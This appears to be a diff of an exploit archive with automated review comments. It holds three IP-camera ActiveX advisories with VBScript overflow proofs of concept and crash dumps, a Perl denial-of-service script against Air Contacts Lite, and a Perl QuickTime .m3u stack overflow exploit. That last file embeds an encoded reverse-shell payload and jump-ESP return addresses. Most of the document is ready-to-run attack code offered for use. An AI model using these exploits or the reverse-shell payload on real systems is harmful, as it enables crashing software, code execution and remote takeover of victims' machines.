16.11.2014
---
Properties:
-----------
FileDescription UltraMJCam ActiveX Control
FileVersion 1, 0, 52, 23
InternalName UltraMJCamX
OriginalFileName UltraMJCamX.ocx
ProductName UltraMJCam device ActiveX Control
ProductVersion 1, 0, 52, 23
List of members:
----------------
Interface IUltraMJCamX : IDispatch
Default Interface: True
Members : 65
RemoteHost
RemotePort
AccountCode
GetConfigValue
SetConfigValue
SetCGIAPNAME
Password
UserName
fChgImageSize
ImgWidth
ImgHeight
SnapFileName
AVIRecStart
SetImgScale
OpenFolder
OpenFileDlg
TriggerStatus
AVIRecStatus
Event_Frame
PlayVideo
SetAutoScale
Event_Signal
WavPlay
CGI_ParamGet
CGI_ParamSet
MulticastEnable
MulticastStatus
SetPTUserAllow
SetLanguage
TimestampEnable
TimestampStroke
Vulnerable members of the class:
--------------------------------
RemoteHost
AccountCode
SetCGIAPNAME
Password
Username
SnapFileName
OpenFolder
CGI_ParamGet
CGI_ParamSet
PoC(s):
-------
---1
<html>
<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
prototype = "Property Let RemoteHost As String"
memberName = "RemoteHost"
progid = "UltraMJCamLib.UltraMJCamX"
argCount = 1
arg1=String(1044, "A")
target.RemoteHost = arg1
</script>
</html>
---2
<html>
<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
prototype = "Property Let AccountCode As String"
memberName = "AccountCode"
progid = "UltraMJCamLib.UltraMJCamX"
argCount = 1
arg1=String(3092, "A")
target.AccountCode = arg1
</script>
</html>
---3
<html>
<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
prototype = "Property Let SetCGIAPNAME As String"
memberName = "SetCGIAPNAME"
progid = "UltraMJCamLib.UltraMJCamX"
argCount = 1
arg1=String(3092, "A")
target.SetCGIAPNAME = arg1
</script>
</html>
---4
<html>
<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
prototype = "Property Let Password As String"
memberName = "Password"
progid = "UltraMJCamLib.UltraMJCamX"
argCount = 1
arg1=String(2068, "A")
target.Password = arg1
</script>
</html>
---5
<html>
<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
prototype = "Property Let UserName As String"
memberName = "UserName"
progid = "UltraMJCamLib.UltraMJCamX"
argCount = 1
arg1=String(4116, "A")
target.UserName = arg1
</script>
</html>
---6
<html>
<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
prototype = "Property Let SnapFileName As String"
memberName = "SnapFileName"
progid = "UltraMJCamLib.UltraMJCamX"
argCount = 1
arg1=String(4116, "A")
target.SnapFileName = arg1
</script>
</html>
---7
<html>
<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
prototype = "Function OpenFolder ( ByVal sInitPath As String ) As String"
memberName = "OpenFolder"
progid = "UltraMJCamLib.UltraMJCamX"
argCount = 1
arg1=String(5140, "A")
target.OpenFolder arg1
</script>
</html>
---8
<html>
<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
prototype = "Function CGI_ParamGet ( ByVal sGroup As String , ByVal sName As String ) As String"
memberName = "CGI_ParamGet"
progid = "UltraMJCamLib.UltraMJCamX"
argCount = 2
arg1=String(4116, "A")
arg2="defaultV"
target.CGI_ParamGet arg1 ,arg2
</script>
</html>
---9
<html>
<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
prototype = "Function CGI_ParamSet ( ByVal sGroup As String , ByVal sName As String , ByVal SVal As String ) As Long"
memberName = "CGI_ParamSet"
progid = "UltraMJCamLib.UltraMJCamX"
argCount = 3
arg1=String(10260, "A")
arg2="defaultV"
arg3="defaultV"
target.CGI_ParamSet arg1 ,arg2 ,arg3
</script>
</html>
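Review bot: the 'Vulnerable members of the class' list writes `Username` while the member list and PoC 5 use `UserName`; IDispatch name lookup is case-insensitive so the PoC still resolves, but the advisory should use the type library's spelling consistently so the two lists can be cross-checked. The crash excerpt shows a controlled pointer (`eax=41414149`) being dereferenced by `cmp dword ptr [eax],0` inside `ntdll!RtlDeleteCriticalSection`, which supports a stack overflow but not, by itself, the 'overwriting ... the SEH' claim in the description; attach `!exchain` output or the overwritten SEH record for at least one of the nine PoCs. Minor: 'parsing large amount of bytes to several functions' should read 'passing a large number of bytes to several functions', and the five template variables (`targetFile`, `prototype`, `memberName`, `progid`, `argCount`) are unused scanner output that could be dropped from each PoC.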

@ -0,0 +1,175 @@
IPUX CL5452/CL5132 IP Camera (UltraSVCamX.ocx) ActiveX Stack Buffer Overflow
Vendor: Big Good Holdings Limited | Fitivision Technology Inc.
Product web page: http://www.ipux.net | http://www.fitivision.com
Affected version: Bullet Type ICL5132 (firmware: ICL5132 2.0.0-2 20130730 r1112)
Bullet Type ICL5452
Summary: The device is H.264 Wired/Wireless IP Camera with 1.3 Mega-pixel sensor.
With high performance H.264 video compression, the file size of video stream is
extremely reduced, as to optimize the network bandwidth efficiency. It has full
Pan/Tilt function and 3X digital zoom feature for a larger space monitoring. The
built-in USB port provides a convenient and portable storage option for local storage
of event and schedule recording, especially network disconnected.
Desc: The UltraSVCam ActiveX Control 'UltraSVCamX.ocx' suffers from a stack buffer
overflow vulnerability when parsing large amount of bytes to several functions in
UltraSVCamLib, resulting in memory corruption overwriting several registers including
the SEH. An attacker can gain access to the system of the affected node and execute
arbitrary code.
----------------------------------------------------------------------------------
(3ef0.3e0c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\Downloaded Program Files\UltraSVCamX.ocx -
eax=41414149 ebx=00000001 ecx=00003e0c edx=02163f74 esi=41414141 edi=02163f74
eip=77e8466c esp=003eef8c ebp=003eefc0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
ntdll!RtlDeleteCriticalSection+0x77:
77e8466c 833800 cmp dword ptr [eax],0 ds:002b:41414149=????????
----------------------------------------------------------------------------------
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5213
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5213.php
16.11.2014
---
Properties:
-----------
FileDescription UltraSVCam ActiveX Control
FileVersion 1, 0, 53, 34 and 1, 0, 53, 33
InternalName UltraSVCamX
OriginalFileName UltraSVCamX.ocx
ProductName UltraSVCam device ActiveX Control
ProductVersion 1, 0, 53, 34 and 1, 0, 53, 33
List of members:
----------------
Interface IUltraSVCamX : IDispatch
Default Interface: True
Members : 51
RemoteHost
RemotePort
AccountCode
Password
UserName
fChgImageSize
ImgWidth
ImgHeight
SnapFileName
AVIRecStart
SetImgScale
OpenFolder
OpenFileDlg
TriggerStatus
AVIRecStatus
PlayVideo
SetAutoScale
SetPTUserAllow
SetLanguage
SetFullScreen
SetZoom
SetDirectShow
SetROIParam
FOpen
FSeek
FDeleteFile
Vulnerable members of the class:
--------------------------------
RemoteHost
AccountCode
SnapFileName
OpenFolder
PoC(s):
-------
---1
<html>
<object classid='clsid:33AD836E-B04E-4114-B39F-AB77AAA08487' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraSVCamX.ocx"
prototype = "Property Let RemoteHost As String"
memberName = "RemoteHost"
progid = "UltraSVCamLib.UltraSVCamX"
argCount = 1
arg1=String(11284, "A")
target.RemoteHost = arg1
</script>
</html>
---2
<html>
<object classid='clsid:33AD836E-B04E-4114-B39F-AB77AAA08487' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraSVCamX.ocx"
prototype = "Property Let AccountCode As String"
memberName = "AccountCode"
progid = "UltraSVCamLib.UltraSVCamX"
argCount = 1
arg1=String(1044, "A")
target.AccountCode = arg1
</script>
</html>
---3
<html>
<object classid='clsid:33AD836E-B04E-4114-B39F-AB77AAA08487' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraSVCamX.ocx"
prototype = "Property Let SnapFileName As String"
memberName = "SnapFileName"
progid = "UltraSVCamLib.UltraSVCamX"
argCount = 1
arg1=String(11284, "A")
target.SnapFileName = arg1
</script>
</html>
---4
<html>
<object classid='clsid:33AD836E-B04E-4114-B39F-AB77AAA08487' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraSVCamX.ocx"
prototype = "Function OpenFolder ( ByVal sInitPath As String ) As String"
memberName = "OpenFolder"
progid = "UltraSVCamLib.UltraSVCamX"
argCount = 1
arg1=String(2068, "A")
target.OpenFolder arg1
</script>
</html>
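Review bot: the title calls the models CL5452/CL5132 while 'Affected version' lists them as ICL5132 and ICL5452, and the firmware string itself reads `ICL5132 2.0.0-2 20130730 r1112`; use one designation throughout so the advisory can be matched to vendor firmware. ICL5452 is listed with no firmware build, unlike ICL5132; either add the tested build or mark it as assumed affected because it ships the same control. 'Members : 51' is followed by only 26 names, so the list is abbreviated without saying so; either label it as partial or include every member, since readers use it to tell which String-typed members were not tested. The same 'parsing ... bytes' wording and unevidenced SEH claim as in the UltraMJCam text apply here; this dump again shows only the `eax=41414149` dereference in `RtlDeleteCriticalSection`.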

@ -0,0 +1,314 @@
?
IPUX CS7522/CS2330/CS2030 IP Camera (UltraHVCamX.ocx) ActiveX Stack Buffer Overflow
Vendor: Big Good Holdings Limited | Fitivision Technology Inc.
Product web page: http://www.ipux.net | http://www.fitivision.com
Affected version: PT Type ICS2330 (firmware: ICS2330 1.1.0-29 20140120 r4296)
Cube Type ICS2030 (firmware: ICS2030 1.1.0-21 20130223 r3967)
Dome Type ICS7522 (firmware: ICS7522 1.1.0-7 20120413 r3812)
Summary: The device is H.264 Wired/Wireless IP Camera with 1.3 Mega-pixel sensor.
With high performance H.264 video compression, the file size of video stream is
extremely reduced, as to optimize the network bandwidth efficiency. It has full
Pan/Tilt function and 3X digital zoom feature for a larger space monitoring. The
built-in USB port provides a convenient and portable storage option for local storage
of event and schedule recording, especially network disconnected.
Desc: The UltraHVCam ActiveX Control 'UltraHVCamX.ocx' suffers from a stack buffer
overflow vulnerability when parsing large amount of bytes to several functions in
UltraHVCamLib, resulting in memory corruption overwriting several registers including
the SEH. An attacker can gain access to the system of the affected node and execute
arbitrary code.
----------------------------------------------------------------------------------
(4b24.478c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\Downloaded Program Files\UltraHVCamX.ocx -
eax=02d04d4f ebx=001dc890 ecx=41414141 edx=41414141 esi=001d6d6c edi=00000009
eip=10032459 esp=0030efe8 ebp=0030efec iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
UltraHVCamX!DllUnregisterServer+0x100e9:
10032459 8b12 mov edx,dword ptr [edx] ds:002b:41414141=????????
0:000> d ecx
41414141 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
41414151 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
41414161 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
41414171 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
41414181 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
41414191 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
414141a1 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
414141b1 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
0:000> d eax
02d04d4f 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
02d04d5f 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
02d04d6f 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
02d04d7f 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
02d04d8f 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
02d04d9f 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
02d04daf 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
02d04dbf 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
----------------------------------------------------------------------------------
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5212
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5212.php
16.11.2014
---
Properties:
-----------
FileDescription UltraHVCam ActiveX Control
FileVersion 1, 0, 52, 55 and 1, 0, 52, 54
InternalName UltraHVCamX
OriginalFileName UltraHVCamX.ocx
ProductName UltraHVCam device ActiveX Control
ProductVersion 1, 0, 52, 55 and 1, 0, 52, 54
List of members:
----------------
Interface IUltraHVCamX : IDispatch
Default Interface: True
Members : 66
RemoteHost
RemotePort
AccountCode
GetConfigValue
SetConfigValue
SetCGIAPNAME
Password
UserName
fChgImageSize
ImgWidth
ImgHeight
SnapFileName
AVIRecStart
SetImgScale
OpenFolder
OpenFileDlg
TriggerStatus
AVIRecStatus
Event_Frame
PlayVideo
SetAutoScale
Event_Signal
WavPlay
CGI_ParamGet
CGI_ParamSet
MulticastEnable
MulticastStatus
SetPTUserAllow
SetLanguage
SetZoomButtonFontColor
SetZoomButtonColor
SetFullScreen
Vulnerable members of the class:
--------------------------------
RemoteHost
AccountCode
SetCGIAPNAME
Password
UserName
SnapFileName
OpenFolder
CGI_ParamGet
CGI_ParamSet
MulticastEnable
PoC(s):
-------
---1
<html>
<object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
prototype = "Function MulticastEnable ( ByVal sIP As String , ByVal lPort As Long ) As Long"
memberName = "MulticastEnable"
progid = "UltraHVCamLib.UltraHVCamX"
argCount = 2
arg1=String(13332, "A")
arg2=1
target.MulticastEnable arg1 ,arg2
</script>
</html>
---2
<html>
<object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
prototype = "Property Let RemoteHost As String"
memberName = "RemoteHost"
progid = "UltraHVCamLib.UltraHVCamX"
argCount = 1
arg1=String(2068, "A")
target.RemoteHost = arg1
</script>
</html>
---3
<html>
<object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
prototype = "Property Let AccountCode As String"
memberName = "AccountCode"
progid = "UltraHVCamLib.UltraHVCamX"
argCount = 1
arg1=String(1044, "A")
target.AccountCode = arg1
</script>
</html>
---4
<html>
<object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
prototype = "Property Let SetCGIAPNAME As String"
memberName = "SetCGIAPNAME"
progid = "UltraHVCamLib.UltraHVCamX"
argCount = 1
arg1=String(1044, "A")
target.SetCGIAPNAME = arg1
</script>
</html>
---5
<html>
<object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
prototype = "Property Let Password As String"
memberName = "Password"
progid = "UltraHVCamLib.UltraHVCamX"
argCount = 1
arg1=String(1044, "A")
target.Password = arg1
</script>
</html>
---6
<html>
<object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
prototype = "Property Let UserName As String"
memberName = "UserName"
progid = "UltraHVCamLib.UltraHVCamX"
argCount = 1
arg1=String(1044, "A")
target.UserName = arg1
</script>
</html>
---7
<html>
<object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
prototype = "Property Let SnapFileName As String"
memberName = "SnapFileName"
progid = "UltraHVCamLib.UltraHVCamX"
argCount = 1
arg1=String(1044, "A")
target.SnapFileName = arg1
</script>
</html>
---8
<html>
<object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
prototype = "Function OpenFolder ( ByVal sInitPath As String ) As String"
memberName = "OpenFolder"
progid = "UltraHVCamLib.UltraHVCamX"
argCount = 1
arg1=String(1044, "A")
target.OpenFolder arg1
</script>
</html>
---9
<html>
<object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
prototype = "Function CGI_ParamGet ( ByVal sGroup As String , ByVal sName As String ) As String"
memberName = "CGI_ParamGet"
progid = "UltraHVCamLib.UltraHVCamX"
argCount = 2
arg1=String(1044, "A")
arg2="defaultV"
target.CGI_ParamGet arg1 ,arg2
</script>
</html>
---10
<html>
<object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
prototype = "Function CGI_ParamSet ( ByVal sGroup As String , ByVal sName As String , ByVal SVal As String ) As Long"
memberName = "CGI_ParamSet"
progid = "UltraHVCamLib.UltraHVCamX"
argCount = 3
arg1=String(1044, "A")
arg2="defaultV"
arg3="defaultV"
target.CGI_ParamSet arg1 ,arg2 ,arg3
</script>
</html>
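Review bot: the faulting symbol `UltraHVCamX!DllUnregisterServer+0x100e9` is not meaningful: the line above says the debugger defaulted to export symbols, so this is merely the nearest export, 0x100e9 bytes away, not the function doing the copy. Record `eip=10032459` as a module-relative offset (eip minus the base that `lm m UltraHVCamX` reports) so it can be located under a different load base. Unlike the MJCam/SVCam dumps, this crash is `mov edx,dword ptr [edx]` with `edx=41414141` and `ecx=41414141` inside the control itself, a controlled pointer dereference, and the `d eax` output places the A-buffer at a non-stack address (`02d04d4f`, compare `esp=0030efe8`); the description paragraph is copied verbatim from the other two advisories and should describe this dump rather than a generic SEH overwrite. The file also begins with a stray byte rendered as `?` ahead of the title line; strip it, and use one model designation (CS7522/CS2330/CS2030 in the title vs ICS7522/ICS2330/ICS2030 in 'Affected version').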

platforms/multiple/dos/35437.pl Executable file
@ -0,0 +1,29 @@
source: http://www.securityfocus.com/bid/46827/info
Air Contacts Lite is prone a denial-of-service vulnerability.
Successful exploits may allow an attacker to crash the affected application, resulting in a denial-of-service condition.
#!/usr/bin/perl
use IO::Socket;
if (@ARGV < 1) {
usage();
}
$ip = $ARGV[0];
$port = $ARGV[1];
print "[+] Sending request...\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
print $socket "GET http://www.example.com. HTTP/1.1\r\n";
print $socket "Host: http://www.example.com.\r\n";
print $socket "Content-Length: 0\x78\x41\x71\x69\r\n\r\n";
sleep(2);
close($socket);
print "[+] Done!\n";
sub usage() {
print "[-] example - Air Contacts Lite (DoS)\n\n";
print "[-] Usage: <". $0 ."> <host> <port>\n";
print "[-] Example: ". $0 ." 127.0.0.1 80\n";
exit;
}
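Review bot: the argument check `if (@ARGV < 1)` guards only the host, but `$port = $ARGV[1]` is then used unconditionally, so a run with a single argument passes the check and calls `IO::Socket::INET->new` with an undefined `PeerPort`; the test should be `if (@ARGV < 2)` to match the usage string `<host> <port>`. Adding `use strict; use warnings;` would have flagged the undefined value. The description does not say what actually triggers the crash, and the request contains two candidates: the absolute-URI request line and `Host:` value (`http://www.example.com.`, which look like SecurityFocus placeholders) and the non-numeric `Content-Length: 0\x78\x41\x71\x69` header; say which one matters so readers do not assume the host name is part of the payload.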

platforms/osx/remote/35433.pl Executable file
@ -0,0 +1,118 @@
source: http://www.securityfocus.com/bid/46799/info
Apple QuickTime is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
An attacker can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
QuickTime 7.5.x is vulnerable; other versions may also be affected.
#!/usr/bin/perl
###
# Title : QuickTime Player v 7.5.x (m3u) Stack Buffer Overflow
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : Remote Access and BOF
# Tested on : Windows XP SP3 Français
# Target : QuickTime Player v 7.5.x
###
# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# ------------
#START SYSTEM /root@MSdos/ :
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "\n\n";
print " |===========================================================|\n";
print " |= [!] Name : QuickTime Player v 7.5.x (m3u) / Apple Inc. =|\n";
print " |= [!] Exploit : Stack Buffer Overflow =|\n";
print " |= [!] Author : KedAns-Dz =|\n";
print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n";
print " |===========================================================|\n";
sleep(2);
print "\n";
print " [!] Please Wait Loading...\n";
# Payload Parameter (http://www.metasploit.com)
# windows/shell_reverse_tcp - 739 bytes
# Encoder: x86/alpha_mixed
# LHOST=127.0.0.1, LPORT=4444, ReverseConnectRetries=5, =>
my $payload =
"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48" .
"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41" .
"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58" .
"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30" .
"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41" .
"\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" .
"\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4d" .
"\x38\x4e\x69\x47\x70\x43\x30\x45\x50\x45\x30\x4d\x59\x4a" .
"\x45\x45\x61\x48\x52\x43\x54\x4e\x6b\x50\x52\x50\x30\x4c" .
"\x4b\x51\x42\x46\x6c\x4e\x6b\x46\x32\x46\x74\x4c\x4b\x50" .
"\x72\x46\x48\x46\x6f\x4f\x47\x43\x7a\x51\x36\x46\x51\x49" .
"\x6f\x46\x51\x4f\x30\x4e\x4c\x47\x4c\x43\x51\x43\x4c\x43" .
"\x32\x44\x6c\x47\x50\x4f\x31\x48\x4f\x46\x6d\x43\x31\x49" .
"\x57\x48\x62\x4c\x30\x51\x42\x42\x77\x4c\x4b\x50\x52\x42" .
"\x30\x4c\x4b\x43\x72\x45\x6c\x46\x61\x4a\x70\x4c\x4b\x43" .
"\x70\x43\x48\x4e\x65\x4b\x70\x42\x54\x50\x4a\x45\x51\x48" .
"\x50\x46\x30\x4e\x6b\x50\x48\x45\x48\x4e\x6b\x51\x48\x51" .
"\x30\x45\x51\x48\x53\x48\x63\x47\x4c\x43\x79\x4e\x6b\x47" .
"\x44\x4e\x6b\x46\x61\x4b\x66\x50\x31\x4b\x4f\x44\x71\x4f" .
"\x30\x4e\x4c\x49\x51\x4a\x6f\x46\x6d\x46\x61\x4f\x37\x46" .
"\x58\x4d\x30\x42\x55\x4a\x54\x46\x63\x43\x4d\x4c\x38\x47" .
"\x4b\x51\x6d\x44\x64\x44\x35\x49\x72\x43\x68\x4c\x4b\x50" .
"\x58\x45\x74\x47\x71\x48\x53\x51\x76\x4e\x6b\x46\x6c\x42" .
"\x6b\x4c\x4b\x42\x78\x47\x6c\x45\x51\x48\x53\x4e\x6b\x45" .
"\x54\x4c\x4b\x47\x71\x48\x50\x4f\x79\x42\x64\x44\x64\x47" .
"\x54\x51\x4b\x51\x4b\x43\x51\x50\x59\x43\x6a\x46\x31\x4b" .
"\x4f\x4d\x30\x50\x58\x43\x6f\x43\x6a\x4c\x4b\x45\x42\x48" .
"\x6b\x4e\x66\x43\x6d\x42\x48\x50\x33\x44\x72\x45\x50\x43" .
"\x30\x51\x78\x42\x57\x42\x53\x46\x52\x43\x6f\x50\x54\x43" .
"\x58\x42\x6c\x44\x37\x44\x66\x45\x57\x49\x6f\x48\x55\x48" .
"\x38\x4c\x50\x47\x71\x45\x50\x47\x70\x47\x59\x4b\x74\x51" .
"\x44\x42\x70\x42\x48\x44\x69\x4d\x50\x42\x4b\x43\x30\x49" .
"\x6f\x48\x55\x50\x50\x42\x70\x50\x50\x42\x70\x47\x30\x42" .
"\x70\x43\x70\x50\x50\x43\x58\x48\x6a\x44\x4f\x49\x4f\x4d" .
"\x30\x49\x6f\x4b\x65\x4e\x69\x48\x47\x42\x48\x43\x4f\x45" .
"\x50\x43\x30\x47\x71\x43\x58\x43\x32\x45\x50\x44\x51\x43" .
"\x6c\x4e\x69\x4a\x46\x51\x7a\x42\x30\x51\x46\x43\x67\x42" .
"\x48\x4d\x49\x4e\x45\x51\x64\x51\x71\x49\x6f\x4e\x35\x50" .
"\x68\x42\x43\x42\x4d\x42\x44\x47\x70\x4c\x49\x48\x63\x51" .
"\x47\x51\x47\x51\x47\x50\x31\x4b\x46\x51\x7a\x47\x62\x51" .
"\x49\x50\x56\x4d\x32\x49\x6d\x50\x66\x4f\x37\x42\x64\x46" .
"\x44\x45\x6c\x47\x71\x43\x31\x4c\x4d\x50\x44\x51\x34\x42" .
"\x30\x4a\x66\x43\x30\x43\x74\x50\x54\x42\x70\x43\x66\x43" .
"\x66\x51\x46\x47\x36\x46\x36\x42\x6e\x50\x56\x46\x36\x42" .
"\x73\x43\x66\x50\x68\x44\x39\x48\x4c\x47\x4f\x4b\x36\x4b" .
"\x4f\x48\x55\x4c\x49\x4b\x50\x50\x4e\x42\x76\x43\x76\x49" .
"\x6f\x50\x30\x42\x48\x43\x38\x4c\x47\x47\x6d\x43\x50\x49" .
"\x6f\x4e\x35\x4f\x4b\x4a\x50\x4d\x65\x4d\x72\x51\x46\x51" .
"\x78\x4d\x76\x4e\x75\x4f\x4d\x4d\x4d\x4b\x4f\x48\x55\x47" .
"\x4c\x46\x66\x43\x4c\x45\x5a\x4b\x30\x49\x6b\x49\x70\x43" .
"\x45\x45\x55\x4d\x6b\x51\x57\x44\x53\x43\x42\x42\x4f\x51" .
"\x7a\x47\x70\x46\x33\x4b\x4f\x49\x45\x41\x41"; #_ End Payload _
# Parameter OverFlow =>
my $eip = pack('V',0x7C86467B); # Jump ESP from kernel32.dll
my $usmh = "\x90" x (50 - length($eip)); # Pack Length x 50
my $ret = pack('V',0x040904b0); # Jump to ESP from QTOControl.dll
$junk = "\x41" x 333 ; # Junk
# immiXing Parameters >>>
$kedans = $junk.$usmh.$ret.$payload ; # Evil KedAns
# >> Creating ...
open (FILE ,"> Bo0M.m3u");
print FILE $kedans ;
print "\nFile successfully created!\n" or die print "\n OpsS! File is Not Created !! ";
close (FILE);
#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
# GreetZ to : Islampard * Dr.Ride * Zaki.Eng * BadR0 * NoRo FouinY * Red1One
# XoreR * Mr.Dak007 * Hani * TOnyXED * Fox-Dz * Massinhou-Dz ++ all my friends ;
# > Algerians < [D] HaCkerS-StreeT-Team [Z] > Hackers <
# My Friends on Facebook : Nayla Festa * Dz_GadlOl * MatmouR13 ...all Others
# 4nahdha.com : TitO (Dr.Ride) * MEN_dz * Mr.LAK (Administrator) * all members ...
# sec4ever.com members Dz : =>>
# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz ... all Others
# hotturks.org : TeX * KadaVra ... all Others
# Kelvin.Xgr ( kelvinx.net)
#===========================================================================
